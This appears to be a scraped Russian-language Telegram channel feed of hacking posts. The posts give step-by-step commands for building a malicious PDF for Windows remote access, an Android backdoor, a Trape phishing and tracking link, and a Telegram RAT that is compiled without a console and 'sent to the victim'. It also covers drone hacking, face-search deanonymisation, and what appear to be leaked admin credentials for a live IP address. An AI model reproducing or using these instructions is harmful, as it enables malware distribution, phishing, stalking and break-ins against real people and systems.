5.28K subscribers
219 photos
33 videos
129 files
858 links
Бот для обращений: @itinfobez_bot
Реклама / сотрудничество: @itinfobez_bot

YouTube:
https://www.youtube.com/channel/UCSESPWvIonIpee3Oa5wUcJA
Download Telegram
​​​​Узнаем человека по фотографии

Search4faces.com — бесплатный сервис для поиска по лицам в соцсетях. На данный момент есть 4 базы изображений:

1 миллиард 109 миллионов 563 тысячи аватарок VK.com;
280 миллионов 781 тысяч аватарок Vk.com + Odnoklassniki.com;
125 миллионов 443 тысячи аватарок TikTok;
4 миллиона 594 тысячи аватарок ClubHouse;

Можно искать не только по фотографии, но и по любому другому изображению человеческого лица. Например, по рисунку или фотороботу.
Security
Осталось 2 места.
Осталось 1 место
​Как взломать ПК через PDF файл?

Формат PDF имеет множество уязвимостей, благодаря которым в файлы можно "вшивать" вирусы и т.п. В данном посте представлен автоматизированный фреймворк Insanity Framework для создания зараженного PDF-файла, который позволит реализовать удаленный доступ к машинам на Windows.

Установка:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod +x insanity.py
$ ./install.sh

Использование:
$ sudo python2 insanity.py

При первом запуске установятся все необходимые зависимости и откроется главное меню. В нём выбираем первый пункт для создания полезной нагрузки. Далее выбираем Fake Acrobat PDF. Вводим ip адрес и порт.
1
Для курса нужно:
1. ноутбук (желательно)

2. Купить Wi-Fi-адаптер Alfa https://aliexpress.ru/item/4001182244965.html
При покупке адаптера напишите продавцу промокод: "Security".
msfgaf-master.zip
10.9 MB
BackDoor на Android!

Бэкдор
- дефект алгоритма, который намеренно встраивается в него разработчиком и позволяет получить несанкционированный доступ к данным или удалённому управлению операционной системой и компьютером в целом.

Основной целью бэкдора является скрытное и быстрое получение доступа к данным, в большинстве случаев - к зашифрованным и защищённым. Например, бэкдор может быть встроен в алгоритм шифрования для последующей прослушки защищённого канала злоумышленником

Использование:
python2 install.py
👍1
Cледим за пользователем через ссылку.

Trape
– OSINT инструмент, который позволяет отслеживать и выполнять атаки социальной инженерии в режиме реального времени.

Trape создает фишинг ссылку, и через нее следит за пользователем.
Благодаря данному инструменту можно получить такую информацию как: IP, локация, ОС.

Также вы сможете запускать удаленно js скрипты, загружать файлы на пк.

Можно будет узнать на каких сервисах зарегестрирован пользователь.


Установка:
$ apt update -y
$ apt upgrade -y
$ apt install python
$ apt install git
$ git clone https://github.com/jofpin/trape.git

Запуск:
$ cd trape
$ pip3 install -r requirements.txt
$ python3 trape.py --url <ссылка на любую страницу> --port 8080

Запуск(Пример):
$ python3 trape.py --url http://example.com --port 8080

Мы получим следующее:
1. Фишинг ссылку.
2. Ссылку на админ панель.
3. Пароль для входа в админ панель.
​​​​​Создаем и распространяем вирус в Telegram

Хотим поделиться с Вами информацией, о том, как создать вирус для удаленного управления целевым ПК с помощью Kali Linux.

Установка в Linux:

apt update && apt upgrade

apt install python3 python3-pip

pip3 install pyinstaller

pip3 install pytelegrambotapi opencv-python cryptography

pip3 install comtypes pywin32

pyaudio pillow pycaw

git clone https://github.com/Bainky/Telegram-RAT

cd Telegram-RAT

Создаем бота в @BotFather. После этого открываем RAT.py через текстовый редактор и вставляем токен и id ранее созданного бота.

Осталось только скомпилировать данный файл:

pyinstaller --onefile --noconsole RAT.py

После того, как процесс компиляции файла будет завершен, отправляем готовый файл нашей жертве.

Если жертва запустит наш вредоносный файл, мы получим удаленный доступ к устройству жертвы в боте Telegram.
https://youtube.com/channel/UCSESPWvIonIpee3Oa5wUcJA

Подпишитесь на канал
dronesploit-master.zip
3.3 MB
Взламываем дроны!

DroneSploit
это среда командной строки, основанная на sploitkit и попытка собрать методы взлома и эксплойты, особенно ориентированные на взлом дронов. Для простоты использования интерфейс имеет макет, похожий на Metasploit. В настоящее время он поддерживает только очень небольшое количество моделей дронов, но мы надеемся, что в ближайшем будущем мы будем приветствовать новые предложения.

Необходимости

1) Linux система;
2) Wi-Fi карта с режимом монитора (многие Wi-Fi адаптеры поддерживают этот режим);
http://59.90.118.98/index.php

Login: admin
Password: admin123
http://nobleshoeco.com/

Даже пароль не зашифрован 😐